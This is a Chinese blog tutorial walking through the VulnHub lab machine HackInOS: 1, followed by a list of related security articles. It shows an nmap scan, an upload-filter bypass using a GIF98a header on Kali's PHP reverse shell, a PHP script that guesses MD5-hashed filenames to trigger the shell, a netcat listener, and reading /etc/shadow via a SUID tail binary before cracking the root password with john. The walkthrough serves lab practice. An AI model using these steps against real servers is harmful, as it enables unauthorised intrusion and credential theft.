黑客零基础第三章-Web漏洞实战-文件上传HackInOS: 1

最新推荐文章于 2022-11-12 16:36:38 发布
最新推荐文章于 2022-11-12 16:36:38 发布
阅读量1.6k 收藏 2
点赞数 2
分类专栏: 零基础黑客训练 文章标签: 系统安全 web安全 安全架构 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43879344/article/details/119940320
版权

第五节内容讲述了文件上传漏洞的利用原理,并在DVWA上进行简单的入侵实验。本节以实战的方式,结合vulnhub靶机HackInOS: 1让大家进一步文件上传漏洞的实际应用。
如果靶机部署有疑问,请留言!

目录

1.信息收集

2.获取低权限shell

 3.提权

 4.总结

1.信息收集

kali IP为192.168.17.4

发现靶机IP 192.168.17.9

使用第二章nmap命令扫描靶机,

nmap -p `nmap -p- --min-rate=10000 -T4 192.168.17.9 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sC -sV --min-rate=10000 192.168.17.9
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-26 09:00 EDT
Nmap scan report for 192.168.17.9
Host is up (0.00027s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA)
|   256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA)
|_  256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (ED25519)
8000/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.0.3
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 2 disallowed entries 
|_/upload.php /uploads
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blog – Just another WordPress site
MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.73 seconds

扫描结果中有uploads目录,貌似可以上传文件。

打开浏览器果然有上传文件的地方,

查看网页源码,提示了一个github连接,有upload.php的源码。

 

阅读源码,发现只能上传png和gif图片,且上传后会对文件进行MD5加密。

2.获取低权限shell

将kali的php webshell进行修改,

 cp /usr/share/webshells/php/php-reverse-shell.php ./rshell_gif.php

 

在webshell前面加上GIF98a可以绕过限制,

 

 上传后显示被存到了uploads目录下,但没有告诉文件名,

 通过upload.php源码的阅读,我们可以写一个php脚本遍历加密文件名,

<?php
for ($i = 1; $i <=100; $i++) {
        $url = md5("rshell_gif.php". $i).(".php");
        file_get_contents("http://192.168.17.9:8000/uploads/$url");
}
?>

执行上面的脚本,遍历加密后文件名,

同时在kali上开启nc,获得低权限shell.

 3.提权

 枚举SUID程序,发现tail是SUID权限。

​​​​​​​

 用tail直接读shadow文件,得到加密的root用户密码,

 使用join进行破解,密码john。

root/join切换root用户,成功!

 4.总结

扫描后发现一个upload.php文件,查看网页源码,有个github连接,里面有upload.php源码。阅读源码发现上传文件类型做了限制,并且上传后文件名组合1-100进行md5加密。编写php脚本直接遍历1-100的md5加密组合文件名即可。

提权是一个SUID tail程序,直接查看shadow文件获取root用户的密码,john解密即可。

获取root权限后该靶机其实还没有结束,本节主要讲解文件上传,后续的部分大家可以参考其他writeup.

 

 

 

 

 

 

 

 

 

第七感小宇宙
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
WEB漏洞扫描器-AWVS 2020年4月最新版acunetix_14.7.220401065
04-18
量身定制的Web安全设备往往不够测试出一些还未发现的漏洞,因此容易成为黑客攻击目标。 Acunetix -在全世界范围内领先的网络应用安全设备 Acunetix开创了网络应用安全扫描技术:它的工程师们潜心研究网络安全。早...
文件上传漏洞
qq_66597767的博客
04-24 2064
目录 文件上传漏洞原理 产生文件上传漏洞的原因 文件上传漏洞可被利用的必要条件 常见的防御方式 绕过方式 1)客户端Javascript检测 2)服务器MIME类型检测 3)后端黑名单绕过 1.本例来源upload-labs中pass-03 2.本例来源upload-labs中pass-04 3)利用后缀名大小写进行绕过 4)后缀名加空格来绕过 5)后缀名加点绕过 6)后缀名中加“::$DATA”绕过 7)利用双写后缀绕过 ​ 4)后端白名单检测绕过 5)服务...
渗透笔记之HackInOS
若水斋
05-24 3157
首发于独立博客:若水斋。 背景 HackInOS是来自VulnHub的渗透测试靶机,下载地址为https://www.vulnhub.com/entry/hackinos-1,295/#download ,下载下来的是一个OVA格式的虚拟机,可在VMware或VirtualBox中打开。虚拟机已设置DHCP,可自动获取IP。 本文较为完整地记录了我对其进行渗透的全过程,开始时间为2019...
利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
weixin_30539835的博客
04-04 819
转载自:https://www.leavesongs.com/PENETRATION/apache-cve-2017-15715-vulnerability.html 目标环境: 比如,目标存在一个上传的逻辑: <?php if(isset($_FILES['file'])) { $name = basename($_POST['name']); ...
Apache安全漏洞
qq_43665434的博客
05-10 5641
Apache安全漏洞 1、Apache中间件介绍 Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。 简单来说就是一个好用的,并且能支持基础的HTML、PHP、Perl、Python等语言。很强 常见目录: bin ------------- 存放常用的命令工具。例如httpd cgi-bin -------
apache 文件上传 (CVE-2017-15715)漏洞复现
YouthBelief的博客
11-10 6474
@[TOC](apache 文件上传 (CVE-2017-15715)) apache 文件上传 (CVE-2017-15715) 0x01 漏洞描述 Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全
黑客攻防技术宝典:Web实战篇(第2版)1
08-03
前言第1章 Web应用程序安全与风险1.1 Web应用程序的发展历程1.1.1 Web应用程序的常见功能1.1.2 Web应用程序的优点1.2 Web应用程序安
quirky-nimbus-hack:古怪的 Nimbus 黑客文件
05-30
古怪的灵气黑客古怪的 Nimbus 黑客文件基于和来自 Matt 的初始 Python 脚本软件设置Pi上的SPI SPI 外设默认不开启。 要启用它,请执行以下操作。 运行sudo raspi-config 。 使用向下箭头选择5 个接口选项向下箭头...
awesome-web-hacking:Web应用程序安全性列表
02-13
Web应用程序黑客手册:发现和利用安全漏洞 入侵Web应用程序:检测和预防Web应用程序安全性问题 入侵暴露的Web应用程序 SQL注入攻击和防御 纠结的WEB:保护现代Web应用程序的指南 网络应用程序混淆:“-/ WAFs.....
hacker-news-pwas:HNPWA-黑客新闻读者作为渐进式Web应用程序:mobile_phone:
02-25
黑客新闻读者作为。 的精神继任者。实作请参阅我们的或site/apps目录以获取当前的实现列表。规格每个实现必须包括: 查看:黑客新闻热门新闻,最新消息,节目,提问,工作和主题评论这些中的每一个都应该使用路由来...
HackInOS
热门推荐
钞sir的博客
07-11 1万+
简介 HackinOS是一个渗透靶机,模拟真实的渗透环境,方便我们练习渗透方法,靶机下载地址… 攻击者:kali 受害者:HackInOS 渗透步骤 ##1.获取目标机器ip 因为我的靶机在虚拟机中网络用的NAT模式,所以靶机IP肯定和kali在同一个网络下,先利用nmap来扫描一波: [外链图片转存失败(img-rRDZlD1d-1562846106264)(./1.png)] [外链图片转存失...
kali渗透综合靶机(十七)--HackInOS靶机
W小哥
04-03 1059
一、靶机下载 下载链接:https://www.vulnhub.com/hackinos/HackInOS.ova 二、HackInOS靶机搭建 攻击机kali搭建在Vmware,桥接模式,ip:192.168.43.48 靶机HackInOS需要用VirtualBox导入ova文件,桥接模式,启动完成之后, 选择Ubuntu系统,因为是模拟攻击就先不登录靶机,ip:192.168.43.104 ...
nmap 常用语法简介
yy2013
10-18 2821
nmap xx.xx.x.x Host is up (0.0012s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 3306/tcp open mysql 8009/tcp open a
vulnhub靶机-sunset:dusk
臭nana的博客
07-18 1007
1、获取靶机ip:192.168.0.127 nmap -sn 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -p- -A 192.168.0.127 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.127 Host is up (0.00097s latency). Not shown: 65529 closed ports PORT STATE SER
网络安全之NMAP工具
月生的静心苑
03-28 1610
一、NMAP简介   nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。从扫描类型一节可以得到细节。nmap还提供了一些高级的特征,例如:通过TCP/IP协议栈特征探测操作系统类型,秘密扫描,动态延时和重传计
Metasploit (二)
weixin_34365635的博客
09-04 220
1、测试一台搭建的主机 msf > db_nmap -n -A 10.140.110.16[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-04 20:19 CST[*] Nmap: Nmap scan report for 10.140.110.16[*] Nmap: Host is up (0.093s laten...
Hacker Fest: 2019-Walkthrough【VulnHub靶场】渗透测试实战系列3
重新启程
12-04 1225
靶场地址:Hacker Fest: 2019 这个靶场在CTF中的等级是easy,作者也提供了一些线索,所以比较适合小伙伴们独立完成。 这个题目是两阶段flag标志获取,普通用户和root分别有flag.txt 虚拟机:virtual box(注:经测试,vmware使用有异常) 虚拟机安装好之后,拿出kali,先扫一下机器地址 nmap -sn 192.168.56.0/24 ...
HACKINOS虚拟机渗透测试
m0_65968201的博客
11-12 553
hackinos渗透过程
wordpress漏洞上传php文件,WordPress wp-admin/includes/file.php任意文件上传漏洞
weixin_31861847的博客
03-09 512
影响版本:WordPress <= 2.8.5漏洞描述:WordPress是一款免费的论坛Blog系统。WordPress中负责上传文件的代码如下:wp-admin/includes/file.php:---[cut]---line 217:function wp_handle_upload( &$file, $overrides = false, $time = null ) {-...
java防止文件上传_文件上传漏洞:getshell的最好方式,我们如何防御?
最新发布
06-10
文件上传漏洞是一种非常常见的Web安全漏洞黑客可以利用此漏洞上传恶意文件(如Webshell),从而实现对服务器的攻击和控制。为了防止文件上传漏洞,可以采用以下措施: 1. 对上传文件进行类型、大小、后缀名等限制,只允许上传必要的文件类型和大小,并且要对文件后缀名进行过滤。 2. 对上传的文件进行病毒扫描,确保上传的文件没有病毒。 3. 对上传的文件进行隔离处理,将上传的文件放在一个独立的目录下,并且禁止执行上传文件的权限。 4. 对上传的文件进行重命名,避免上传文件名中包含敏感信息或特殊字符。 5. 对上传文件的权限进行严格控制,只有具有上传权限的用户才能上传文件。 6. 定期对上传目录进行扫描,及时发现上传漏洞和上传的恶意文件。 以上措施可以有效地防止文件上传漏洞,但是需要注意的是,不同的Web应用程序可能存在不同的漏洞,需要根据具体情况进行处理。同时,也需要定期更新和维护Web应用程序,保证其安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值